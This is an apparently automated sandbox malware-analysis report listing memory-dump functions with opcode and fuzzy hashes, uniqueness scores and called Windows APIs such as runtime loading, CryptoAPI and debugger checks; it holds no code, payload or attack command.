Instruction ID: 60a6aa6c6e210638b9a2d11df2328b579c55c9f94e583c98f621ef6e789d2f0c
Opcode Fuzzy Hash: 6802c40a707688c694ccd9dfda9e76fcf647e509bc66ed9573526ed6fec9e324
Instruction Fuzzy Hash: 5711F3B4E052099FCB44DFA9D5445AEBBF5FF49300F2085AAD858A7315EB305A01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0325F108 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d56e6530ef498f27efeed036450a893694029aa5122c5791106e23333d8baa1
Instruction ID: 4a809a903506342ea41118c9c7963a408d3cde2b237c632d239e187eadd2ff1e
Opcode Fuzzy Hash: 4d56e6530ef498f27efeed036450a893694029aa5122c5791106e23333d8baa1
Instruction Fuzzy Hash: A2018431239550EFC71ADA60D7486753BA39B01D00F08808AFC038B691DBB48B86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03250848 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91ce62fd2ef8cb6738795d68e570b6d741044b55e6b176eb82b6f312c138eee
Instruction ID: 8c60c4638b0d0cb22d7aa652db0e8a5f9f59f50e77079ea1e4392893ca719bae
Opcode Fuzzy Hash: e91ce62fd2ef8cb6738795d68e570b6d741044b55e6b176eb82b6f312c138eee
Instruction Fuzzy Hash: B611E5B4D01309EFCB44DFA8E548AAEBBB1FF49300F5085A9D815A3254EB755B44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03253020 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cfdb452932906b9960764c68998cabe608a2377f099df4d1ba3c6dec0a49165
Instruction ID: a52058d77300e263a86d25e021947ceedff77a55b98811f9256bf9d56c807bde
Opcode Fuzzy Hash: 6cfdb452932906b9960764c68998cabe608a2377f099df4d1ba3c6dec0a49165
Instruction Fuzzy Hash: B40104B8E15209DFCB44DFA9D5846AEBBF1FF48300F2085AAD858A3315EB305A40CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03258588 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63c7811d94a475512c38844c58c1ce90f80b2be21428f6d25e584f4302e3d08
Instruction ID: 78582bf8b78635405f84eac0cc21e458f4c3d124cf305ec8d3c5f1caa761ba47
Opcode Fuzzy Hash: d63c7811d94a475512c38844c58c1ce90f80b2be21428f6d25e584f4302e3d08
Instruction Fuzzy Hash: 37F02B3371A3859FCB168B24D8159BE7FB69E9625070944AFFC45C7241C6B0CB11DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0325AF08 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6cf3e58db6e529a11775f82f4d9a7e992b71bf5630a1e8104c5476f2bc11279
Instruction ID: e19428e514f1185f35926041d9aa04b0241e8bf847f240b4cd20f079937dd7cd
Opcode Fuzzy Hash: f6cf3e58db6e529a11775f82f4d9a7e992b71bf5630a1e8104c5476f2bc11279
Instruction Fuzzy Hash: 00F0BBB2539305EECB23CE7194026A67BE4AF01310B0481A7FC49D7100D7B69BC68763

Uniqueness

Uniqueness Score: -1.00%

Function 03250BFC Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69039c6fa60c1de5b5b2b003a4a34863c2d79014c54776c1887b63c7ad3124a0
Instruction ID: 6ff315ecd60e0aabc2e27569ecf6f91c03ec9143be07b6df6fbd02466131c479
Opcode Fuzzy Hash: 69039c6fa60c1de5b5b2b003a4a34863c2d79014c54776c1887b63c7ad3124a0
Instruction Fuzzy Hash: 6EF0F6B180E3848FC302CBB8DC61554BFB4EF03305B4841DBE881CB2A2D6349B09DB16

Uniqueness

Uniqueness Score: -1.00%

Function 018CD134 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721015189.00000000018CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18cd000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8171dafcef27261c901477f37cc66c8d37642ef4c1cd281a2928edcf24337de8
Instruction ID: b4637d1d2b9f353d23a912ee2f11f8e369d8ec68bbf77a5435446a50544956eb
Opcode Fuzzy Hash: 8171dafcef27261c901477f37cc66c8d37642ef4c1cd281a2928edcf24337de8
Instruction Fuzzy Hash: E2F0C2710083409EF7109E1ACCC4B62FFA8EB80724F18C56AED084F286C2789844CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0325D0AE Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11eb44a0e4fcfebd12c020e583f947080da255c7f5965072d6ebb57903f700f
Instruction ID: 962630c9b9c6106b18d192ec4be2c46355429382a58256cd84164b80bcc6425b
Opcode Fuzzy Hash: d11eb44a0e4fcfebd12c020e583f947080da255c7f5965072d6ebb57903f700f
Instruction Fuzzy Hash: B301723B014604AFCB068F80D909D91BFB6FF0932170A80DAE6098B132C232E561EB51

Uniqueness

Uniqueness Score: -1.00%

Function 032599F8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8658077164737bd30726f1f25e4320a74e2ab363efb7f17068106d291b1313e
Instruction ID: 3e3b3a0d9ef759a48afe5c16e6629e231dce83a597663d712871c7a36377f3b4
Opcode Fuzzy Hash: c8658077164737bd30726f1f25e4320a74e2ab363efb7f17068106d291b1313e
Instruction Fuzzy Hash: 5DF01474D0624ACFCB46DFB8D5442ADBFF0AF46200F2441AAD844A7205D7704B81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0325E8D9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245d41f0eabeb74edde47521034958cce14de9718632fec5726d1728c622b86c
Instruction ID: 01981cf0f6b35cfbb211ffb01a8cd25c147ef5abcb2523d0f9b39e3e6ce18c80
Opcode Fuzzy Hash: 245d41f0eabeb74edde47521034958cce14de9718632fec5726d1728c622b86c
Instruction Fuzzy Hash: BEF08235A34229CF8B04DE68D4844ECF7A2FB8420434205AAE86397210DB709B40CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03258598 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff0551312fdd17440e4d30d8b5d210887aecc07ede2f20f9de2ec8ffadff113
Instruction ID: c186db6b672f10d9249dfe99f00fa5ef66fde9955485ddcc83aae1d310a0d940
Opcode Fuzzy Hash: 8ff0551312fdd17440e4d30d8b5d210887aecc07ede2f20f9de2ec8ffadff113
Instruction Fuzzy Hash: 64E06D35301359BB8F1A1F559814CBF3FAAEBC82327048016FD56C2240CF71CB62ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 0325A2E1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f1f91929185a205a23272b8642d30144338a8d0fbd6afc384c0b0832a53cf6
Instruction ID: 8bb0a49a28ff5283acff0bc9c4af3567429279d31fa78ee8b25f5c1aebb0a1c1
Opcode Fuzzy Hash: a6f1f91929185a205a23272b8642d30144338a8d0fbd6afc384c0b0832a53cf6
Instruction Fuzzy Hash: 3EF08C349A9208DFCB11DFA0C1869BDBB74AF59304F205559EC0AAB315CBB09AC4CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0325E63E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0833e56f553f055a6a0fb21c29e858d0c14a7f374b699869211dba786f119fa0
Instruction ID: 94f10b051e340c1eb49052f75e49a946a2f57482ea3a6df53a90717ebbaf96fd
Opcode Fuzzy Hash: 0833e56f553f055a6a0fb21c29e858d0c14a7f374b699869211dba786f119fa0
Instruction Fuzzy Hash: 1CE092312263109FD329CE18D048A9977E5AB01384F49415EF44687291DBB1EF85C781

Uniqueness

Uniqueness Score: -1.00%

Function 03259A08 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1461ed7b9a1ca914322a7ca36e4512c31d73dfe81f9b14625f1ede866ca6c044
Instruction ID: 146800883a8eed9dcd30cb1a06d1ebfce5b2257f0ebdea634866f9549081b195
Opcode Fuzzy Hash: 1461ed7b9a1ca914322a7ca36e4512c31d73dfe81f9b14625f1ede866ca6c044
Instruction Fuzzy Hash: B5F07474D1120ADFCB44EFA8D5446AEBBF4BB48200F2081A99809A3344DB709B41DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0325CD10 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1ee86a57797e617d016c287e630ab0f71bf27bdd4f70a90ef2666f72ed1b1bd
Instruction ID: bd4a7f9e8d76e8d705aa8b004c89a6feb1b48d70a3ff9ce9ccafcc980ba98282
Opcode Fuzzy Hash: d1ee86a57797e617d016c287e630ab0f71bf27bdd4f70a90ef2666f72ed1b1bd
Instruction Fuzzy Hash: 38E09231A053489FCB41DBB8D90064EBFF5DF42300F1040A9D404CB262D9369A518792

Uniqueness

Uniqueness Score: -1.00%

Function 0325A300 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1d2cfb3b6ef82811791198e5c4d7e6c4f1a1a57b3c6ff016af7a722f16b8b7
Instruction ID: 5ba6bca30291630bb03e8be68c55d97b1920cf42eafdd0caf3420faa3ada8ad9
Opcode Fuzzy Hash: 8e1d2cfb3b6ef82811791198e5c4d7e6c4f1a1a57b3c6ff016af7a722f16b8b7
Instruction Fuzzy Hash: 6FE04F348A930DDAC711DFA0C1466BD7B74AF55308F600A15DC066A245C7F48AC0CA51

Uniqueness

Uniqueness Score: -1.00%

Function 0325FF5E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d7dd7934d277a298c139227aedbfaa88fb7eb434b6c42d29cc78666e68f0f6
Instruction ID: cce3e0931875eac26d72e708479b1c6f52a801384fd4a8968affa12655a23adf
Opcode Fuzzy Hash: a4d7dd7934d277a298c139227aedbfaa88fb7eb434b6c42d29cc78666e68f0f6
Instruction Fuzzy Hash: 7EE0C2367002108FC728DB48E58099CF362EF80320B5285A6E85E9F681DB31EC428B84

Uniqueness

Uniqueness Score: -1.00%

Function 032543C0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea693cb29ac928fd170fd367c44d677ccc99837714e53f237c95857db2340a5c
Instruction ID: 968c49c1971638e3e4f73ac0f84d8e05196ae1b94bcff4c3e39110198a1b876a
Opcode Fuzzy Hash: ea693cb29ac928fd170fd367c44d677ccc99837714e53f237c95857db2340a5c
Instruction Fuzzy Hash: E5E0CD34109344BFC7219F75D818515BFB8EB11240F0440F7E841C6062D675C195CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0325CD20 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d8c51a00455da6d1202789eda940ea343f597b9983d83785a40d89d48945df
Instruction ID: 427f8541f2469efead53f1f400c3d54917cd4028d29e9f4538f567aca8c22306
Opcode Fuzzy Hash: e4d8c51a00455da6d1202789eda940ea343f597b9983d83785a40d89d48945df
Instruction Fuzzy Hash: 95D01730B0120CAFCB80DBB8CA0065FBBE9DB85304F1041A8D809C7354E936AF008B91

Uniqueness

Uniqueness Score: -1.00%

Function 032543D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8262ac049616c38748a6b9fa788dbbf46c939b5241daab82f666be8a1aa36c
Instruction ID: d0c4e0412cb1ff481900a7a47d019df684452d5e78f61bd5970b464b346d3125
Opcode Fuzzy Hash: ba8262ac049616c38748a6b9fa788dbbf46c939b5241daab82f666be8a1aa36c
Instruction Fuzzy Hash: FED0C931211209FFDB60AB76E908A19BFA8EB10251F448466F80586161DA75C6949A50

Uniqueness

Uniqueness Score: -1.00%

Function 03258161 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed54a93008071d0b384bb5ad0a6c3c08db140e5060ce4ff16e43b5e8c2b79ab
Instruction ID: cbb6e60ae262ea4995625b7805a3e6a088b4420d1394dbfcc9aa0f7188f637be
Opcode Fuzzy Hash: eed54a93008071d0b384bb5ad0a6c3c08db140e5060ce4ff16e43b5e8c2b79ab
Instruction Fuzzy Hash: 0ED0127554D3829FCB11CBA0CD86F447FB0AF1A704F4444EAF1598F096C676A416DF52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D082D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D082DFF
VariantInit.OLEAUT32(?), ref: 6D082E08
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D082E7E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D082EB5
VariantClear.OLEAUT32(?), ref: 6D082EC1

Part of subcall function 6D08C850: VariantInit.OLEAUT32(?), ref: 6D08C88F
Part of subcall function 6D08C850: VariantInit.OLEAUT32(?), ref: 6D08C895
Part of subcall function 6D08C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D08C8A0
Part of subcall function 6D08C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D08C8D5
Part of subcall function 6D08C850: VariantClear.OLEAUT32(?), ref: 6D08C8E1

VariantClear.OLEAUT32(?), ref: 6D0830D5
SafeArrayDestroy.OLEAUT32(?), ref: 6D083550
VariantClear.OLEAUT32(?), ref: 6D083563
VariantClear.OLEAUT32(?), ref: 6D083569

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 85083079e8008432302e1a4e2b031b5d05dcfc081fa53854cf89d5d055e32c86
Instruction ID: 96b9366af14c31f34fc106b0b21a31a5b97ac836d9d332271f2015f9167a64a0
Opcode Fuzzy Hash: 85083079e8008432302e1a4e2b031b5d05dcfc081fa53854cf89d5d055e32c86
Instruction Fuzzy Hash: 8D524871900219DFEF14DFA8C884BAEBBF5BF89700F158199E909EB351DB30A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D07A0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON

Download Yara Rule

APIs

CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6D0F0634,6D0F0738,?), ref: 6D07A119
GetModuleHandleW.KERNEL32(mscorwks), ref: 6D07A145
__cftoe.LIBCMT ref: 6D07A1FB
GetModuleHandleW.KERNEL32(?), ref: 6D07A215
GetProcAddress.KERNEL32(00000000,00000018), ref: 6D07A265

Strings

v2.0.50727, xrefs: 6D07A110
wks, xrefs: 6D07A10B
mscorwks, xrefs: 6D07A140

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: 41553b3db53784c02621cbabb28e73293cab2bca78fea4863095d6ab67804822
Instruction ID: 21b506cb8849b5f80d9fc5f0366592c51053e071cf9f46d87f95c7f72e54a11a
Opcode Fuzzy Hash: 41553b3db53784c02621cbabb28e73293cab2bca78fea4863095d6ab67804822
Instruction Fuzzy Hash: 60917C70D042499FEB14DFE9D880AAEBBF5BF49310F20826DE519EB280D734E906CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BDBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,400BD10B,6D0E8180,00000000,?), ref: 6D0BDBFB
GetLastError.KERNEL32 ref: 6D0BDC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6D0BDC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6D0BDC26
SetLastError.KERNEL32(00000000), ref: 6D0BDC2D

Part of subcall function 6D0BD9D0: GetLastError.KERNEL32(00000010,400BD10B,75A8FC30,?,00000000), ref: 6D0BDA1A

__CxxThrowException@8.LIBCMT ref: 6D0BDC78

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

CryptAcquireContext, xrefs: 6D0BDC35
Crypto++ RNG, xrefs: 6D0BDC0D, 6D0BDC20

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 5ae45bcb56303ffc4fcdb7cafb05bc710966cff7ae8f0074fd251aab0d8e362f
Instruction ID: 7df9437b0bac4e4456b16d9b8649e72f4d871078c60ab665da1c8385ea21f396
Opcode Fuzzy Hash: 5ae45bcb56303ffc4fcdb7cafb05bc710966cff7ae8f0074fd251aab0d8e362f
Instruction Fuzzy Hash: 8B218E7124C341AFF310AB24CC45F6BBBE8AB89B54F00092DF645D72C1EBB5E4048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6D0CCE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D0CCE81
UnhandledExceptionFilter.KERNEL32(6D0E9428), ref: 6D0CCE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6D0CCEA8
TerminateProcess.KERNEL32(00000000), ref: 6D0CCEAF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f94223634b649ea7b9e10729afdf68a4c07ab49fcf8b234f8b37e3084de12cfc
Instruction ID: f74925b2f0e158dee21e5e6ccf3dcab32f489da45a907e35c8b3b4057271621f
Opcode Fuzzy Hash: f94223634b649ea7b9e10729afdf68a4c07ab49fcf8b234f8b37e3084de12cfc
Instruction Fuzzy Hash: D121DDB5805208EFDB50EF69E684B497BB4FB0A314F50411EE50987B41EBF499808F19

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C2310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D0C24A1

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

std::exception::exception.LIBCMT ref: 6D0C248C

Part of subcall function 6D0C9533: std::exception::_Copy_str.LIBCMT ref: 6D0C954E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
